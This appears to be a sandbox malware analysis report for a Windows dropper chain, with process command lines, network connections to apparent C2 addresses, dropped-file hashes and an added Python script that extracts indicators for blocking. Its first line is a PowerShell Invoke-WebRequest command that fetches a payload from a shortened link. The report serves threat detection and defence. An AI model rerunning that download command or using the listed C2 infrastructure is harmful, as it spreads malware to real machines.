powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/3RmFzgo'"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

"C:\Users\Admin\AppData\Local\Temp\tuc3.exe"

C:\Users\Admin\AppData\Local\Temp\is-VMQBB.tmp\tuc3.tmp

"C:\Users\Admin\AppData\Local\Temp\is-VMQBB.tmp\tuc3.tmp" /SL5="$C002E,7276951,68608,C:\Users\Admin\AppData\Local\Temp\tuc3.exe"

C:\Users\Admin\AppData\Local\Temp\nsh63E8.tmp.exe

C:\Users\Admin\AppData\Local\Temp\nsh63E8.tmp.exe

C:\Users\Admin\AppData\Local\Temp\6ACF.exe

C:\Users\Admin\AppData\Local\Temp\6ACF.exe

Network

Country  Destination            Domain                           Proto
US       8.8.8.8:53             83.177.190.20.in-addr.arpa       udp
US       8.8.8.8:53             241.154.82.20.in-addr.arpa       udp
US       8.8.8.8:53             179.178.17.96.in-addr.arpa       udp
US       8.8.8.8:53             55.36.223.20.in-addr.arpa        udp
US       8.8.8.8:53             41.110.16.96.in-addr.arpa        udp
US       8.8.8.8:53             95.221.229.192.in-addr.arpa      udp
RU       185.215.113.68:80      185.215.113.68                   tcp
US       8.8.8.8:53             bitbucket.org                    udp
US       104.192.141.1:443      bitbucket.org                    tcp
US       8.8.8.8:53             68.113.215.185.in-addr.arpa      udp
US       8.8.8.8:53             bbuseruploads.s3.amazonaws.com   udp
US       54.231.229.1:443       bbuseruploads.s3.amazonaws.com   tcp
US       8.8.8.8:53             1.141.192.104.in-addr.arpa       udp
US       8.8.8.8:53             1.229.231.54.in-addr.arpa        udp
RU       5.42.65.125:80         5.42.65.125                      tcp
US       8.8.8.8:53             125.65.42.5.in-addr.arpa         udp
US       8.8.8.8:53             50.23.12.20.in-addr.arpa         udp
RU       77.105.132.87:17066    -                                tcp
US       8.8.8.8:53             206.23.85.13.in-addr.arpa        udp
US       8.8.8.8:53             87.132.105.77.in-addr.arpa       udp
US       8.8.8.8:53             217.135.221.88.in-addr.arpa      udp
US       8.8.8.8:53             github.com                       udp
DE       140.82.121.4:443       github.com                       tcp
N/A      195.20.16.103:18305    -                                tcp
US       8.8.8.8:53             objects.githubusercontent.com    udp
US       185.199.111.133:443    objects.githubusercontent.com    tcp
US       8.8.8.8:53             4.121.82.140.in-addr.arpa        udp
US       8.8.8.8:53             103.16.20.195.in-addr.arpa       udp
US       8.8.8.8:53             133.111.199.185.in-addr.arpa     udp
US       8.8.8.8:53             api.ipify.org                    udp
US       104.237.62.212:80      api.ipify.org                    tcp
US       8.8.8.8:53             212.62.237.104.in-addr.arpa      udp
BG       91.92.254.7:80         91.92.254.7                      tcp
RU       5.42.64.35:80          5.42.64.35                       tcp
US       8.8.8.8:53             bit.ly                           udp
US       67.199.248.11:443      bit.ly                           tcp
US       8.8.8.8:53             7.254.92.91.in-addr.arpa         udp
US       8.8.8.8:53             35.64.42.5.in-addr.arpa          udp
US       8.8.8.8:53             114.110.16.96.in-addr.arpa       udp
(- = no domain recorded; the connection was made directly to the IP)
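Most rows in the network tables of both detonations are sandbox plumbing (the 8.8.8.8 resolver and reverse in-addr.arpa lookups) or legitimate services the campaign abuses for hosting and IP lookup (bitbucket.org, github.com, S3, bit.ly, api.ipify.org), whose addresses cannot be blocked without collateral damage. What is left, the bare-IP destinations on port 80 and on odd ports such as 17066 and 18305, is the C2 and payload infrastructure worth blocking, and the Files sections carry the hashes of every dropped stage. The Python below is an added example, not part of the report: it parses network rows and file-hash blocks in the plain-text layout used on this page, separates raw-IP C2 candidates from abused-service and resolver noise, and collects per-file hashes. The embedded excerpt is copied from this report; the list of services treated as abused-but-legitimate is an assumption.

```python
import re

# Services the report shows the campaign using for payload hosting and IP
# lookup. Their addresses are shared infrastructure, so they are reported as
# domains to hunt rather than as C2 to block. Assumed list.
ABUSED_SERVICES = {
    "bitbucket.org", "bbuseruploads.s3.amazonaws.com", "github.com",
    "objects.githubusercontent.com", "bit.ly", "api.ipify.org",
}
RESOLVER = "8.8.8.8"  # the sandbox's DNS server

# "CC ip:port [domain] proto"; the domain column is absent or "-" on raw-IP rows
_NET_ROW = re.compile(
    r"^(?P<cc>[A-Z]{2}|N/A)\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+)"
    r"(?:\s+(?P<domain>\S+))?\s+(?P<proto>tcp|udp)$"
)
_HASH_ROW = re.compile(r"^(?P<algo>MD5|SHA1|SHA256|SHA512)\s+(?P<hex>[0-9a-fA-F]+)$")
# Dropped-file headers: C:\..., \Users\..., or NT-style \??\c:\...
_PATH_ROW = re.compile(r"^(?:\\\?\?\\)?[A-Za-z]:\\|^\\Users\\", re.IGNORECASE)


def extract_iocs(report_text: str) -> dict:
    """Pull C2 candidates, abused services and dropped-file hashes out of the
    plain-text Network and Files tables used in this report."""
    c2, abused, files = set(), set(), []
    for raw in report_text.splitlines():
        line = raw.strip()
        m = _NET_ROW.match(line)
        if m:
            ip, port, domain = m.group("ip"), m.group("port"), m.group("domain")
            if domain in (None, "-", ip):
                domain = None
            # Resolver traffic and reverse lookups are sandbox plumbing; the
            # names they resolve reappear on the connection rows.
            if ip == RESOLVER or (domain and domain.endswith(".in-addr.arpa")):
                continue
            if domain in ABUSED_SERVICES:
                abused.add(domain)
            elif domain is None:
                c2.add(f"{ip}:{port}")  # raw-IP destination, often a non-standard port
            else:
                c2.add(f"{domain} ({ip}:{port})")
            continue
        if _PATH_ROW.match(line):
            files.append({"path": line})  # hash rows that follow belong to this file
            continue
        m = _HASH_ROW.match(line)
        if m and files:
            files[-1][m.group("algo").lower()] = m.group("hex").lower()
    return {
        "c2": sorted(c2),
        "abused_services": sorted(abused),
        "files": [f for f in files if len(f) > 1],  # drop path lines with no hashes
    }


# Lines copied from this report's behavioral2 Network and Files sections.
REPORT_EXCERPT = r"""
Country Destination Domain Proto
US 8.8.8.8:53 83.177.190.20.in-addr.arpa udp
RU 185.215.113.68:80 185.215.113.68 tcp
US 8.8.8.8:53 bitbucket.org udp
US 104.192.141.1:443 bitbucket.org tcp
US 54.231.229.1:443 bbuseruploads.s3.amazonaws.com tcp
RU 5.42.65.125:80 5.42.65.125 tcp
RU 77.105.132.87:17066 tcp
DE 140.82.121.4:443 github.com tcp
N/A 195.20.16.103:18305 tcp
US 104.237.62.212:80 api.ipify.org tcp
BG 91.92.254.7:80 91.92.254.7 tcp
RU 5.42.64.35:80 5.42.64.35 tcp
US 67.199.248.11:443 bit.ly tcp

Files

memory/1800-0-0x0000000000400000-0x000000000040A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\F4B0.exe

MD5 9a747219c8fab73e2ba0541e3d86cd8b
SHA1 0723a7c85108ebd6a8141a7ce2459c35add81a0c
SHA256 eb33681098da51a889200090735de67ff170fbb4adb5b01284f08821134f5f01

C:\Users\Admin\AppData\Local\Temp\6C2.exe

MD5 1713300ba962c869477e37e4b31e40af
SHA256 2bcdb7a75707f841615be19f4bbcb95fc6b16ce19fb7ea782c5ff43ea1be024d
"""

if __name__ == "__main__":
    iocs = extract_iocs(REPORT_EXCERPT)
    print("block:", *iocs["c2"], sep="\n  ")
    print("hunt (abused services):", *iocs["abused_services"], sep="\n  ")
    for f in iocs["files"]:
        print("file:", f["path"], f.get("sha256", "(no sha256)"))
```

Feed it the whole page rather than the excerpt and the C2 list comes out the same six addresses; the abused-service domains are better matched on full URLs at the proxy (the bitbucket and githubusercontent download paths) than on IP, since both hosts serve far more legitimate traffic than malware.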

Files

memory/1800-0-0x0000000000400000-0x000000000040A000-memory.dmp

memory/3540-1-0x0000000002540000-0x0000000002556000-memory.dmp

memory/1800-3-0x0000000000400000-0x000000000040A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\F4B0.exe

MD5 9a747219c8fab73e2ba0541e3d86cd8b
SHA1 0723a7c85108ebd6a8141a7ce2459c35add81a0c
SHA256 eb33681098da51a889200090735de67ff170fbb4adb5b01284f08821134f5f01
SHA512 acb9faf833107d7a0ff16692861b03e3c719ef60851335082e75b16a53ee073ce53418e1aa57ca8c164ebb695ffc44638bfaeb533a79e15e1d480cee34b65a83

memory/3628-12-0x00000000008E0000-0x0000000000932000-memory.dmp

memory/3628-17-0x0000000074F90000-0x0000000075740000-memory.dmp

memory/3628-18-0x00000000055E0000-0x0000000005B84000-memory.dmp

memory/3628-19-0x0000000004F70000-0x0000000005002000-memory.dmp

memory/3628-20-0x0000000005110000-0x0000000005120000-memory.dmp

memory/3628-21-0x0000000005040000-0x000000000504A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\6C2.exe

MD5 1713300ba962c869477e37e4b31e40af
SHA1 d5c4835bc910acccd28dbed0c451043ea8de95ef
SHA256 2bcdb7a75707f841615be19f4bbcb95fc6b16ce19fb7ea782c5ff43ea1be024d
SHA512 70b2a2b17c6b3a0a295baf536451ef38c6e9e292a3c967a9fc950a6de321bbac0dc45e942ef151ba81b717f8ede3166388e68ce75f2afff0ec16aea98ea742e1

memory/4440-26-0x0000000000A10000-0x0000000000EAE000-memory.dmp

memory/4440-27-0x0000000074F90000-0x0000000075740000-memory.dmp

memory/4440-28-0x0000000005960000-0x00000000059FC000-memory.dmp

memory/4440-29-0x0000000005A70000-0x0000000005A80000-memory.dmp

memory/3628-30-0x00000000065B0000-0x0000000006BC8000-memory.dmp

memory/3628-32-0x00000000064A0000-0x00000000065AA000-memory.dmp

memory/3628-33-0x00000000063C0000-0x00000000063D2000-memory.dmp

memory/3628-34-0x0000000007E70000-0x0000000007EAC000-memory.dmp

memory/3628-35-0x0000000007EC0000-0x0000000007F0C000-memory.dmp

memory/3628-36-0x0000000008A40000-0x0000000008AA6000-memory.dmp

memory/3628-37-0x0000000008E80000-0x0000000008ED0000-memory.dmp

memory/3628-38-0x0000000005110000-0x0000000005120000-memory.dmp

memory/4440-39-0x0000000006370000-0x0000000006538000-memory.dmp

memory/4440-40-0x0000000007640000-0x00000000077D2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Protect544cd51a.dll

MD5 544cd51a596619b78e9b54b70088307d
SHA1 4769ddd2dbc1dc44b758964ed0bd231b85880b65
SHA256 dfce2d4d06de6452998b3c5b2dc33eaa6db2bd37810d04e3d02dc931887cfddd
SHA512 f56d8b81022bb132d40aa78596da39b5c212d13b84b5c7d2c576bbf403924f1d22e750de3b09d1be30aea359f1b72c5043b19685fc9bf06d8040bfee16b17719

memory/4440-47-0x0000000005A70000-0x0000000005A80000-memory.dmp

memory/4440-46-0x0000000005A70000-0x0000000005A80000-memory.dmp

memory/4440-49-0x0000000005A70000-0x0000000005A80000-memory.dmp

memory/4440-48-0x0000000005A60000-0x0000000005A70000-memory.dmp

memory/3628-50-0x0000000074F90000-0x0000000075740000-memory.dmp

memory/4440-52-0x0000000005A70000-0x0000000005A80000-memory.dmp

memory/4440-51-0x0000000007DB0000-0x0000000007EB0000-memory.dmp

memory/2684-53-0x0000000000400000-0x000000000043C000-memory.dmp

memory/4440-54-0x0000000007DB0000-0x0000000007EB0000-memory.dmp

memory/4440-57-0x0000000005A70000-0x0000000005A80000-memory.dmp

memory/4440-55-0x0000000007DB0000-0x0000000007EB0000-memory.dmp

memory/3628-58-0x0000000005110000-0x0000000005120000-memory.dmp

memory/4440-59-0x0000000074F90000-0x0000000075740000-memory.dmp

memory/2684-60-0x0000000074F90000-0x0000000075740000-memory.dmp

memory/2684-61-0x0000000007A60000-0x0000000007A70000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\412D.exe

MD5 8b9a9846ed22725498334d05cd53e96b
SHA1 819487e2407b6070479a121594987160e8721ae1
SHA256 c6d0249a5f2565e25e90b9ec84dadbc3a297206374cce478c2c5511dae67c426
SHA512 62ea545908c0c3fe2e0356d2149eba870543202ceb412583a5df7d439c93d4f1de3cf4ac3d24ba0b8ffcef7f5f641f13d01c8ff8dea43d38b24a84cfc81469d6

C:\Users\Admin\AppData\Local\Temp\412D.exe

MD5 b2352a1ad0375980b805a09e9b2da12c
SHA1 692586364edfb0c7f3de38d4f410a75ee99b6790
SHA256 6a0c49855fd13193e5df48f663ead25b1d7d8b294fd7c1ae09e964e4228ccd12
SHA512 532b6c0033e021aa21e67651590ec73a827ddbb1ed179c0636c22cf6a4154f01919cbdcfe7a92943ee86c2574904924229dd31bc43e27a28b65e83963c98bb48

memory/4092-66-0x0000000074F90000-0x0000000075740000-memory.dmp

memory/4092-67-0x0000000000250000-0x0000000001042000-memory.dmp

memory/3628-70-0x0000000009B00000-0x0000000009CC2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

MD5 c6c53c63657293e4da62c4e7f1d1831b
SHA1 a8379d445fb2226da97418f4d75bad07ef9290ca
SHA256 900c0640ba1e682128403dd48d4865aa07f3a63086c7e19bc8baa0ca79bd6cdf
SHA512 9033f375fa453f04734b22837f08d50b7c01156fce8cfc1536921afc8014015753e48280d266d8e71a5bb3b0a79572cdb82b08c921149d797c7494418ff85965

C:\Users\Admin\AppData\Local\Temp\48FE.exe

MD5 dc6fbf2cd9ad1f1f0ac200e9bec7ea3f
SHA1 c3af9d82d270829784339331dea63f927400e0d4
SHA256 2337b4b50924227e6f8772d9ce4b4bdbe6b8cfff15f493ea977e7c1280ad8590
SHA512 39307ae10cd7db4ff6da65090bf86af362955c25793dcf60cff65892aa759d3befc1180ee9039f5611f2d8393848a4f265dd34dd690161488b99c2a30b4aae2f

memory/3628-77-0x000000000A200000-0x000000000A72C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

MD5 9445be826cc1c194fe4364740ed979f9
SHA1 4efeb5866d82d211dd1f5a8a064ab83ab837af33
SHA256 c041d73c596c5686d387cdd9043ae9a669f1525524eaa02969960789f82547c6
SHA512 a868706e191b9084ca14e8f2b85b540c7ff758dde92a91488cd2b38c327811e07900b1a3c6ca870528a4b9e5ee9b410787f69a2c419317d768f02f9a85e3929a

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 62b01ec4a955eab3a7a41e2c07f18913
SHA1 48d8e1e391fa078d78e2130481f9d35eb45a11ec
SHA256 c76de2cd7f512fb4ccef14734eb63daa46c05c7e372e886381652e97dee9af56
SHA512 725dcf11ab6140f249e570960864011d12687ce177988ae9ec378a67062509c52a343a4db80cfdb9de03200eaf66569016590c1091cbda74ca795cf24f60fb56

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

MD5 e0b201d9da0623b03d1de1b63457e7b0
SHA1 60f1a5148b2f479efc51547e210a2ae583305b71
SHA256 18b641a8d75f26adb52148ff99a69a790e061d130924f62c08ffcedbadf87571
SHA512 c118ec59658286d35f00e9f49ec21f1c5508c77ca7ada4d81e40b0ed221bfb4722bb18c1e95a72bdde95af8323bb70bd6bc9a6e3bfad37ce2f33fcd0a0b048ea

C:\Users\Admin\AppData\Local\Temp\nsx4C18.tmp\Math.dll

MD5 ebd8a7a5042ae1d4ce1aa9071859c851
SHA1 ee508ce7cbe8b1b0bd471bee43e1ec19d21e8ad6
SHA256 fb6a0072377325b5da0d1da236d9da2610608e9ab74318e15540cc7aca75f837
SHA512 daebecc30e91b19737b346ed7ac85ada87757f53fa67fdd262ba617b29c24ebde4058171f71bf1bc8d0d8b39a9a346c7ef2a9968908dbc16723069d8f9507b0e

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\install.bat

MD5 60c9624e093baac4bef11ab4fc846111
SHA1 07a25911c81e04608a0dc6fb065524a9da82dd65
SHA256 e60ede01e4c366eca01c0d420190370cb52fb239d508593b343912735ef51d1d
SHA512 14e031235f82bb93ba8044c2d39673094707814e67485d819eccad5d1aae972bfba6a12d7bb27d9f70e38a94c3f5152a3d49a799ca9501a64afb420bb280ff24

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 0277dcbf0f270408ad6da03d0bc91b9a
SHA1 01fe1f3b96c9f4e64217c5437cfc0e0a73e234a7
SHA256 e19b0f1aa5c0f5ca4a97c996decb300e75a268c055715ae9e2fc6617a9441aaf
SHA512 7d089bda969c4d3a1c0f0939b9e1846e1e4e272897ee2c9399bfc92bf76d82afe471e3e61c744a0022fea04b60e803dc4a0a02b12f689899b773b8bd14540263

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 3b951c1abb0759086712224f8f6358dd
SHA1 ae7c06bfc7a3cf501c9760cc5ffbc8daaafafbbf
SHA256 6e0a154c6cbc66d2401987946f4c241ed87105ea24e4a29e13d890bd4cdfd968
SHA512 acbc0fe85c65c647debca24cd3eb383189bd0a4366b92303a62be4f94422d3f2d05f2a0edcde5f3a9913495ba77980de7168a8b6df24cef64c06703df04fd1b2

memory/2952-116-0x00007FFC39050000-0x00007FFC39B11000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

MD5 eb531d81b8b7b4e7e6a5c91556d78281
SHA1 adfd40f48a48b0fd0e8a427e2a19b9051f946530
SHA256 47c8e2e9026f6acd497524c3e4dd910712fae8e0f24d5979e857d9b96f9b9b8a
SHA512 c38c980c83634f36ef24632bbcf2dab255016354d4f9cb2ef00ef21b1d9817cfa13a3daaecc0daa62db78d849ddf2050d93030f50083e0ddc06b035b7a7fbc11

C:\Users\Admin\AppData\Local\Temp\nsx4C18.tmp\INetC.dll

MD5 40d7eca32b2f4d29db98715dd45bfac5
SHA1 124df3f617f562e46095776454e1c0c7bb791cc7
SHA256 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9
SHA512 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d

memory/2952-117-0x0000014E75750000-0x0000014E75760000-memory.dmp

memory/2952-118-0x0000014E75750000-0x0000014E75760000-memory.dmp

memory/552-119-0x00000000008B0000-0x00000000008B9000-memory.dmp

memory/4876-121-0x0000000000400000-0x0000000000409000-memory.dmp

memory/552-120-0x00000000009C0000-0x0000000000AC0000-memory.dmp

memory/3628-124-0x0000000005110000-0x0000000005120000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_arg0bq3t.cdy.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2556-125-0x0000000000B40000-0x0000000000B41000-memory.dmp

memory/2952-135-0x0000014E77900000-0x0000014E77922000-memory.dmp

memory/4876-123-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

MD5 1c1bcdb0b26032497a333c49e5777e5c
SHA1 ad3f475adcb7c92818a9007f26e284faab2372c5
SHA256 a503985a9cd752160db220650711b84834b3ad631497bb3133d7c73fc28dbf92
SHA512 0f28b2c7a3a913accb98a70f6f8d4ed70a1a90bd14a0106cf41628a9314b7e42b8d917c25157fb92fc3031543ff035a0760a6bca670cd3ad9483f9eadd118313

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

MD5 7d2bf2a6b821dd9f87ad328ea27af2e5
SHA1 a32a1e0d1f401c5ba3cd4d53430fc2b61286c821
SHA256 a617ca6b1603e5a637e79c6f6d3fe36efb4eeff9cfb4df7a0a57a2a21ffedb9a
SHA512 6234081698dee53ce4f826fdc1bee44c6d5b1f68f6d13bec5186013cb5c6ea4af3a40ba544fe822ca6bb0a52c7a7d6a489ee54f6ccfcd2ab2d1d79396da5568a

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

MD5 69a86cf45d9ce53c1f497f0921770a5f
SHA1 9d92e5c7e600779be84e21fd7d54ce3e91683b04
SHA256 7bb67b2ed4d5f7b7a6e92118e7b2a1a92c0a2720e76d59499a67861c0261d582
SHA512 552e8b7bb8da2d9654734f48837bcbb09e23b19a99621c7cbbf47ff5954fb5fa63fb31678a9e7a0fababf312c91d0aee4f2cac0a28d3ef132ea3600c6469685e

memory/2240-144-0x0000000000400000-0x0000000000418000-memory.dmp

memory/4624-147-0x00000000029A0000-0x0000000002DA6000-memory.dmp

memory/4092-150-0x0000000074F90000-0x0000000075740000-memory.dmp

memory/2240-149-0x0000000000400000-0x0000000000418000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-VMQBB.tmp\tuc3.tmp

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Temp\is-VMQBB.tmp\tuc3.tmp

MD5 f448d7f4b76e5c9c3a4eaff16a8b9b73
SHA1 31808f1ffa84c954376975b7cdb0007e6b762488
SHA256 7233b85eb0f8b3aa5cae3811d727aa8742fec4d1091c120a0fe15006f424cc49
SHA512 f8197458cd2764c0b852dac34f9bf361110a7dc86903024a97c7bcd3f77b148342bf45e3c2b60f6af8198ae3b83938dbaad5e007d71a0f88006f3a0618cf36f4

memory/4624-151-0x0000000002DB0000-0x000000000369B000-memory.dmp

memory/4624-155-0x0000000000400000-0x0000000000D1C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-S4J2J.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

C:\Users\Admin\AppData\Local\Temp\is-S4J2J.tmp\_isetup\_isdecmp.dll

MD5 3adaa386b671c2df3bae5b39dc093008
SHA1 067cf95fbdb922d81db58432c46930f86d23dded
SHA256 71cd2f5bc6e13b8349a7c98697c6d2e3fcdeea92699cedd591875bea869fae38
SHA512 bbe4187758d1a69f75a8cca6b3184e0c20cf8701b16531b55ed4987497934b3c9ef66ecd5e6b83c7357f69734f1c8301b9f82f0a024bb693b732a2d5760fd303

memory/1236-171-0x0000000000550000-0x0000000000551000-memory.dmp

memory/2952-172-0x0000014E75750000-0x0000014E75760000-memory.dmp

memory/4876-287-0x0000000000400000-0x0000000000409000-memory.dmp

memory/3540-283-0x0000000002770000-0x0000000002786000-memory.dmp